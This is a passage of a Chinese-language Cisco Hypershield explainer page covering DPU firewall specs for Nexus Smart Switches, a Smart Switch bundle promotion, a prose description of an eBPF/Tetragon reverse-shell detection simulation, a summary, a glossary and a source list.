水平扩展 · 添加 Smart Switch 即增加执行点
安全随工作负载自然增长
OS 沦陷影响
Resilience
安全随之崩溃 · 防火墙 Agent 或 IPtables 被禁用
攻击者获取 Root 即可关闭所有防护
安全独立运行 · DPU 物理隔离
Out-of-band,OS 沦陷不影响安全引擎
TCO 影响
Total Cost
防火墙硬件 + 许可 + 30% CPU 浪费 + 运维人力 释放 30% 服务器算力可抵消硬件升级成本
MTTR 从"天"降低到"分钟"

DPU 防火墙目标规格

Target Scale for N9324C-SE1U & N9348Y2C6D-SE1U

规格参数 目标值 备注
吞吐量 ≤ 800 Gbps 全部 DPU 聚合带宽
有状态会话数 64M(6400 万) 分布在各 DPU 之间
过滤策略数 2M(目标)/ 100K(首发) 远超传统 TCAM 5K-8K
VRF 重定向数 100(首发)
每秒新建连接 500K CPS N9324 (4×16 ARM) > N9348 (2×16 ARM)
日志导出 Syslog / Splunk / Controller 80K CPS/DPU(无日志时)
决策洞察:Smart Switch 捆绑促销

25G ToR Smart Switch(N9348Y2C6D-SE1U)捆绑 DCN Premier 许可的价格与 Nexus 93180YC-FX3 + DCN Advantage 相同,但前者额外提供 6 个 400G 上行端口和 800G DPU 安全服务能力。促销有效期至 2026 年 7 月 25 日。对于任何新建 Fabric 或 EOL 刷新项目,Smart Switch 已成为默认推荐的 ToR 选型——即使当前不启用 DPU(Network Mode),也为未来安全演进预留了能力。

10

实时模拟:eBPF 捕获 RCE 攻击全过程

Live Simulation: Tetragon Detecting & Blocking a Reverse Shell

以下交互式终端模拟展示了 Tetragon 如何在 Linux 内核层级实时发现 Apache 进程尝试反弹 Shell 的瞬间,以及 Hypershield 如何通过 DPU 硬件即时阻断攻击流量。点击 "▶ 开始模拟" 按钮观看完整过程。

root@hypershield-node-01 · Tetragon + Hypershield DPU · RCE Detection Simulation
[ Hypershield Node · Tetragon eBPF Agent v1.3.0 · DPU Enforcement Active ]
[ ── 等待模拟启动... 点击下方按钮开始 ── ]
模拟说明

此模拟展示了一个完整的 MITRE ATT&CK 链条:Initial Access(Log4Shell JNDI 注入)→ Execution(反弹 Shell)→ Lateral Movement(内网扫描)。Tetragon 在 Execution 阶段的第一个系统调用即介入阻断,DPU 随后在网络层面封堵出站连接——攻击链在第二步就被彻底切断。

11

总结:安全架构的新纪元

Summary: A New Era — From Perimeter Appliances to Native Fabric

极致性能

硬件级 P4 线速阻断意味着安全不再是延迟的代名词。800Gbps 有状态吞吐、~8μs 端到端开销、400G MACsec/IPsec——安全成为基础设施的内生能力,而非外挂负担。

👁️

极致可见

eBPF/Tetragon 提供深入骨髓的内生可见性——不仅看 IP/端口,更看进程、用户、系统调用、文件操作。从内核到网络,从容器到裸机,无盲区全量观测。

🛡️

极致韧性

DPU 独立运行环境确保即使操作系统被完全攻破,安全系统依然以 Out-of-band 方式独立运行。分布式架构消除了单点故障——安全随工作负载自然水平扩展。

本文的设计哲学——遵循 Patrick Henry Winston《Make It Clear》原则

Symbolism(符号化):用"大脑、眼睛、肌肉"将解耦的分布式架构具象为生物免疫体——读者无需死记组件名称,只需理解功能角色。
Symmetry(对称性):在硬件(DPU)与软件(eBPF)描述中,始终保持 感知→决策→执行 的三层对称映射。
Near-misses(对比确认):通过传统边界防火墙 vs 分布式硬件加速、静态 ACL vs P4 动态编程、CPU Tax vs 零开销的反复对比,帮助读者深刻体会技术代际跃迁的本质差异。

面对 AI 驱动的新型威胁,我们的防御必须同样具备 AI 的进化速度。

Cisco Hypershield 并非只是一个新的防火墙——它是数据中心的外骨骼(Exoskeleton),是安全从"边界设备"到"原生织物"的根本范式转变。

G

术语表 Glossary

所有专业术语中英对照及简短解释

术语 (English) 中文翻译 简短解释
DPU (Data Processing Unit)数据处理器继 CPU、GPU 之后的第三类处理器,专为数据中心设计,卸载网络/存储/安全计算任务。
NPU (Network Processing Unit)网络处理器交换机中的专用芯片(如 Silicon One E100),负责 L2/L3 高速转发。
P4协议无关数据包处理器编程语言面向硬件数据面的领域专用语言(DSL),允许动态定义报文解析和匹配-动作逻辑。
eBPF (Extended Berkeley Packet Filter)扩展伯克利包过滤器Linux 内核中的受限沙箱执行环境,允许安全地注入定制逻辑用于观测和策略执行。
TetragonTetragon 安全运行时基于 eBPF 的高级安全观测与执行引擎(Isovalent/Cisco),提供内核级同步式监控。
RDMA (Remote Direct Memory Access)远程直接内存访问允许网络设备直接读写远程主机内存,绕过 CPU,实现超低延迟通信。AI 训练中广泛使用。
RoCEv2 (RDMA over Converged Ethernet v2)基于融合以太网的 RDMA v2在标准以太网上实现 RDMA 的协议,AI GPU 集群间通信的主流方案。
TCAM (Ternary Content-Addressable Memory)三态内容可寻址存储器交换机中用于高速匹配 ACL/路由的专用硬件,价格昂贵、容量有限。
ACL (Access Control List)访问控制列表网络设备上定义允许/拒绝流量的规则集。
Stateful FW (Stateful Firewall)有状态防火墙能跟踪 TCP 连接状态(握手、数据传输、挥手),仅允许属于已建立连接的返回流量。
Shadow Testing / Digital Twin双胞胎测试 / 数字孪生在隔离环境中用真实流量镜像测试新策略,不实际阻断,仅报告"如果上线会怎样"。
DEP (Distributed Exploit Protection)分布式漏洞利用防护在厂商补丁发布前,自动在 DPU 层面部署补偿性控制措施阻断已知漏洞利用。
Live Protect实时保护 / 虚拟补丁NX-OS 内嵌的 eBPF 驱动虚拟补丁方案,无需升级/重启即可缓解 CVE。
MACsec (Media Access Control Security)MAC 层安全IEEE 802.1AE 标准,在以太网第二层提供逐帧加密和完整性保护。
VRF (Virtual Routing and Forwarding)虚拟路由转发在同一设备上创建多个逻辑路由表实例,实现网络虚拟化和隔离。
VXLAN (Virtual Extensible LAN)虚拟可扩展局域网使用 UDP 封装的二层隧道协议,实现跨三层网络的二层连通和大规模网络虚拟化。
EVPN (Ethernet VPN)以太网虚拟专用网络基于 BGP 的控制面协议,与 VXLAN 配合实现可扩展的数据中心网络虚拟化。
ToR (Top of Rack)机架顶部交换机部署在服务器机架顶部的接入层交换机,直接连接服务器。
Hairpinning发卡弯流量被迫绕行到远端设备再折返的路径,增加延迟和带宽浪费。
Tail Latency尾延迟延迟分布中 P99/P99.9 处的高延迟值。分布式系统中,最慢节点决定整体性能。
RCE (Remote Code Execution)远程代码执行攻击者利用漏洞在远程系统上执行任意代码的攻击类型,危害等级通常为"严重"。
ADM (Application Dependency Mapping)应用依赖映射自动发现应用间的通信关系和依赖,为微分段策略提供基础。
SCC (Security Cloud Control)安全云控制Cisco 的 SaaS 安全管理平台,提供跨防火墙/Smart Switch/Agent 的统一策略管理。
CPS (Connections Per Second)每秒新建连接数衡量防火墙/安全设备处理新 TCP 连接建立能力的关键指标。
📖 参考文献与引用来源

攻击统计数据 — Sources: Morphisec 2025, Elisity 2025, IBM Cost of Breach 2024, Edgescan 2024, Cisco Talos July 2025 · 引自 TECSEC-2004 §8, §130BDM Deck §Attacker's Advantage

软件防火墙 CPU 消耗与 Hypershield 愿景 — smartswitch.html §01 愿景与挑战

东西向流量分段死角与 Hairpinning — TECSEC-2004 §27-28 Why distributed security

④⑤ 每日漏洞披露数量与 60 天补丁周期 — TECSEC-2004 §8, §130

DPU 卸载与 eBPF 深度观测技术路径 — smartswitch.html §02; TECSEC-2004 §66-68

AMD Pensando DPU 规格(ARM 核心、P4 流水线) — BRKDCN-2643 §AMD DPU; Cisco N9300 TDM Deck §10

核心组件定义(DPU/P4/eBPF 价值) — smartswitch.html §02 核心组件深度定义

eBPF 安全沙箱机制与验证器 — TECSEC-2004 §66-78 eBPF Foundation

eBPF 性能影响基准测试 (<2%) — TECSEC-2004 §78 eBPF Performance

自主分段 — smartswitch.html §02 Three Pillars; TECSEC-2004 §84

DPU 目标规格(2M 规则/64M 会话/500K CPS) — Cisco N9300 TDM Deck §88 Target Scale

DEP 分布式漏洞防护 — TECSEC-2004 §131, §135-137

Shadow Testing / 双胞胎测试 — smartswitch.html §05; TECSEC-2004 §45-48

Smart Switch "第三条路径"架构 — smartswitch.html §03; Cisco N9300 TDM Deck §3

DPU 报文处理流程(P4 快路径/VPP 慢路径) — Cisco N9300 TDM Deck §60; BRKDCN-2643 §DPU Day in the Life

端到端延迟对比 (~8μs vs 50ms+) — Cisco N9300 TDM Deck §22; BRKDCN-2643

TCAM vs DPU 规则容量对比 — Cisco N9300 TDM Deck §42 Segmentation Compared

IPSec 路线图 (10.7.1F) — BDM Deck §Network Mode Roadmap

双人格设计(NetOps + NetSecOps) — Cisco N9300 TDM Deck §16, §18; BRKDCN-2643; TECSEC-2004 §40

Tetragon 同步式内核观测 — TECSEC-2004 §80, §134

漏洞管理集成(Wiz/Qualys/Tenable) — BDM Deck §Live Protect Patching Challenges

DPU 物理隔离与 Out-of-band 运行 — smartswitch.html §02, §06, §11

VRF/VLAN 重定向与对称哈希 — Cisco N9300 TDM Deck §38-40; BRKDCN-2643 §VRF/VLAN Redirect

数字免疫系统隐喻 — smartswitch.html §04

四步闭环工作流程与 RCE 示例 — smartswitch.html §05, §07

历史流量回放与 Timescape — TECSEC-2004 §49-50

策略下发机制(gRPC/P4) — TECSEC-2004 §119; Cisco N9300 TDM Deck §19

TCO 对比与 MTTR 改善 — smartswitch.html §09

三类执行点部署 — smartswitch.html §06; TECSEC-2004 §83-90

工作负载 Agent 类型 — TECSEC-2004 §56-60; BDM Deck §Hypershield Security

Hypershield On-Prem Controller(3 VM) — Cisco N9300 TDM Deck §17

分布式 Fabric 水平扩展 — TECSEC-2004 §27-28, §123

AI-Native 自适应响应速度 — TECSEC-2004 §131; BDM Deck §Attacker's Advantage

CVE-2024-21626 RunC 容器逃逸 — TECSEC-2004 §135-138

Live Protect 业界首创 — BDM Deck §Live Protect for Cisco Nexus

CVE-2024-20446/20413 防御案例 — Cisco N9300 TDM Deck §87

Live Protect 支持平台列表 — BDM Deck §Live Protect Supported Platforms

AI 集群 RoCEv2 卸载与 400G 加密 — smartswitch.html §08

Salina 架构路线图 — smartswitch.html §03 2025 前瞻

AI Fabric GPU 分段与前后端架构 — smartswitch.html §08; BDM Deck §Secure Your AI Fabrics